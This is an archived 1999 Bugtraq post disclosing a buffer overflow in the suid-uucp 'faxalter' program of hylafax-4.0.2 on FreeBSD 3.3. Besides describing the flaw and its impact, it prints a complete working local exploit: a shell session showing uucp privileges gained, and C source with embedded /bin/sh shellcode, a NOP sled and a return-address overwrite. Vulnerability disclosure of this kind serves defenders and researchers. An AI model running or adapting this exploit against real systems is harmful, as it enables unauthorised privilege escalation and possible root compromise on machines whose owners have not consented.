Bugtraq mailing list archives
hylafax-4.0.2 local exploit
From: btellier () USA NET (Tellier, Brock)
Date: Wed, 3 Nov 1999 21:09:35 -0800
Greetings, OVERVIEW A vulnerability exists in "faxalter", part of the hylafax-4.0.2 package which will allow any user gain uucp and possibly root privs. BACKGROUND My tests were done only on FreeBSD 3.3-RELEASE which includes the hylafax package as an "additional package" on the install CD. Of course, hylafax runs on many different platforms thus anyone running hylafax should check out his or her version for this vulnerability. DETAILS The faxalter program is installed suid-uucp by default when installed from the FreeBSD-3.3 CD hylafax package. This program is contains a buffer overflow which will allow any user to gain uucp privs. This could become a root-compromise considering that uucp has write access to several programs (such as minicom, cu and ecu on FreeBSD 3.3) and could potentially trojan these programs. In addition to this, the suid-root "hfaxd" program reads/writes to several uucp-owned files. At the very least, a malicious user could intercept all faxes, uucp transmitions and be generally annoying. EXPLOIT bash-2.03$ uname -a; ls -la `which faxalter`; id FreeBSD 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh () highwing cdrom com:/usr/src/sys/compile/GENERIC i386 -r-sr-xr-x 1 uucp bin 72332 Sep 11 03:32 /usr/local/bin/faxalter uid=1000(xnec) gid=1000(xnec) groups=1000(xnec), 0(wheel) bash-2.03$ /home/xnec/faxalterx $ id uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec), 0(wheel) $ /* * Faxalter exploit for FreeBSD 3.3/hylafax-4.0.2 yields euid=66(uucp) * Brock Tellier btellier () usa net */ #include <stdio.h> char shell[]= /* mudge () lopht com */ "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9" "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46" "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51" "\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh"; main (int argc, char *argv[] ) { int x = 0; int y = 0; int offset = 0; int bsize = 4093; /* overflowed buf's bytes + 4(ebp) + 4(eip) + 1 */ char buf[bsize]; int eip = 0xbfbfcfad; if (argv[1]) { offset = atoi(argv[1]); eip = eip + offset; } fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize); for ( x = 0; x < 4021; x++) buf[x] = 0x90; fprintf(stderr, "NOPs to %d\n", x); for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y]; fprintf(stderr, "Shellcode to %d\n",x); buf[x++] = eip & 0x000000ff; buf[x++] = (eip & 0x0000ff00) >> 8; buf[x++] = (eip & 0x00ff0000) >> 16; buf[x++] = (eip & 0xff000000) >> 24; fprintf(stderr, "eip to %d\n",x); buf[bsize - 1]='\0'; execl("/usr/local/bin/faxalter", "faxalter", "-m", buf, NULL); } Brock Tellier UNIX Systems Administrator Chicago, IL, USA
Current thread:
- Re: [Re: Amanda multiple vendor local root compromises] Brock Tellier (Nov 01)
- Re: [Re: Amanda multiple vendor local root compromises] Peter Walker (Nov 01)
- Re: [Re: Amanda multiple vendor local root compromises] Robert Watson (Nov 02)
- [debian] New version of nis released Aleph One (Nov 02)
- RFP9907: You, your servers, RDS, and thousands of script kiddies .rain.forest.puppy. (Nov 03)
- UnixWare 7's dtappgather Elias Levy (Nov 03)
- NeoPlanet Saves all emails in Plain text James J. Capone (Nov 03)
- hylafax-4.0.2 local exploit Tellier, Brock (Nov 03)
- IE 5.0 vulnerabilities using HTTP redirection Georgi Guninski (Nov 04)
- <Possible follow-ups>
- Re: [Re: Amanda multiple vendor local root compromises] Alexandre Oliva (Nov 02)
- Re: [Re: Amanda multiple vendor local root compromises] Bruce A. Mah (Nov 02)
- Re: [Re: Amanda multiple vendor local root compromises] Frank Crawford (Nov 03)
- Re: [Re: Amanda multiple vendor local root compromises] Alexandre Oliva (Nov 03)
- Re: [Re: Amanda multiple vendor local root compromises] Peter Walker (Nov 01)